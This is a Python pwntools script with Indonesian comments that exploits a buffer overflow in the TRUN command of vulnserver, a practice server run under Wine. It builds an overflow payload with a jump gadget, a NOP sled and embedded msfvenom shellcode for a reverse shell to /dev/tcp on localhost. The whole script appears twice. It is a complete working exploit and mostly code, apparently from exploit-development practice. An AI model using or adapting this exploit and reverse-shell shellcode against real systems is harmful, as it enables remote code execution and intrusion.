sharpicx/fuzzing.py

## fuzzing.py
# running vulnserver in wine
# debug it on winedbg with gef plugin enabled
from pwn import *
import string
from struct import pack

context.log_level = "DEBUG"
r = remote("127.0.0.1", 9999)
'''
else if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
                char *TrunBuf = malloc(3000);
                memset(TrunBuf, 0, 3000);
                for (i = 5; i < RecvBufLen; i++) {
                    if ((char)RecvBuf[i] == '.') {
                        strncpy(TrunBuf, RecvBuf, 3000);
                        Function3(TrunBuf);
                        break;
                    }
                }
                memset(TrunBuf, 0, 3000);
                SendResult = send( Client, "TRUN COMPLETE\n", 14, 0 )
'''
# shellcode
# msfvenom -p linux/x86/exec CMD='/bin/sh -c /bin/sh -i >& /dev/tcp/127.0.0.1/12345 0>&1' -f py -v bof -b '\x00
bof = b""
bof += b"\xbe\xec\xf8\xef\x07\xdb\xd7\xd9\x74\x24\xf4\x5f"
bof += b"\x29\xc9\xb1\x17\x31\x77\x14\x03\x77\x14\x83\xc7"
bof += b"\x04\x0e\x0d\x85\x0c\x96\x77\x08\x75\x4e\xa5\xce"
bof += b"\xf0\x69\xdd\x3f\x70\x1d\x1e\x28\x59\xbf\x77\xc6"
bof += b"\x2c\xdc\xda\xfe\x18\x22\xdb\xfe\x49\x40\xb2\x90"
bof += b"\xba\xf7\x2c\x4d\xe8\x94\x8c\xa2\x90\x33\xa3\x93"
bof += b"\x27\xab\x1b\xc1\xae\x0b\x62\x3f\x11\x64\xfe\x5a"
bof += b"\x27\x55\x8a\xc7\xb7\x86\x43\x3a\x0f\xf6\x93\x14"
bof += b"\x5f\x28\xe5\x47\xae\x06\x36\xac\xe5\x46\x08\xf2"
bof += b"\x23\xb7\x68\x5d\x7f\x3e\x89\xac\xff"

offset = 2002 # fuzzing dari fungsi get_commandNotFound.
new_payload = b""
new_payload += b"TRUN ." # dapet "." dari string.punctuation.encode()
new_payload += b"A" * offset
new_payload += b"BBBB" # ini biar si gadget kena di instruction pointer
new_payload += pack("<I", 0x625011AF) # gadget dari dll, di vulnserver.exe cuma jmp eax
new_payload += b"\x90" * 100 # nopsled buat ngelancarin si shellcode
new_payload += bof

r.sendline(new_payload)
r.close()
	# running vulnserver in wine
	# debug it on winedbg with gef plugin enabled
	from pwn import *
	import string
	from struct import pack

	context.log_level = "DEBUG"
	r = remote("127.0.0.1", 9999)
	'''
	else if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
	char *TrunBuf = malloc(3000);
	memset(TrunBuf, 0, 3000);
	for (i = 5; i < RecvBufLen; i++) {
	if ((char)RecvBuf[i] == '.') {
	strncpy(TrunBuf, RecvBuf, 3000);
	Function3(TrunBuf);
	break;
	}
	}
	memset(TrunBuf, 0, 3000);
	SendResult = send( Client, "TRUN COMPLETE\n", 14, 0 )
	'''
	# shellcode
	# msfvenom -p linux/x86/exec CMD='/bin/sh -c /bin/sh -i >& /dev/tcp/127.0.0.1/12345 0>&1' -f py -v bof -b '\x00
	bof = b""
	bof += b"\xbe\xec\xf8\xef\x07\xdb\xd7\xd9\x74\x24\xf4\x5f"
	bof += b"\x29\xc9\xb1\x17\x31\x77\x14\x03\x77\x14\x83\xc7"
	bof += b"\x04\x0e\x0d\x85\x0c\x96\x77\x08\x75\x4e\xa5\xce"
	bof += b"\xf0\x69\xdd\x3f\x70\x1d\x1e\x28\x59\xbf\x77\xc6"
	bof += b"\x2c\xdc\xda\xfe\x18\x22\xdb\xfe\x49\x40\xb2\x90"
	bof += b"\xba\xf7\x2c\x4d\xe8\x94\x8c\xa2\x90\x33\xa3\x93"
	bof += b"\x27\xab\x1b\xc1\xae\x0b\x62\x3f\x11\x64\xfe\x5a"
	bof += b"\x27\x55\x8a\xc7\xb7\x86\x43\x3a\x0f\xf6\x93\x14"
	bof += b"\x5f\x28\xe5\x47\xae\x06\x36\xac\xe5\x46\x08\xf2"
	bof += b"\x23\xb7\x68\x5d\x7f\x3e\x89\xac\xff"

	offset = 2002 # fuzzing dari fungsi get_commandNotFound.
	new_payload = b""
	new_payload += b"TRUN ." # dapet "." dari string.punctuation.encode()
	new_payload += b"A" * offset
	new_payload += b"BBBB" # ini biar si gadget kena di instruction pointer
	new_payload += pack("<I", 0x625011AF) # gadget dari dll, di vulnserver.exe cuma jmp eax
	new_payload += b"\x90" * 100 # nopsled buat ngelancarin si shellcode
	new_payload += bof

	r.sendline(new_payload)
	r.close()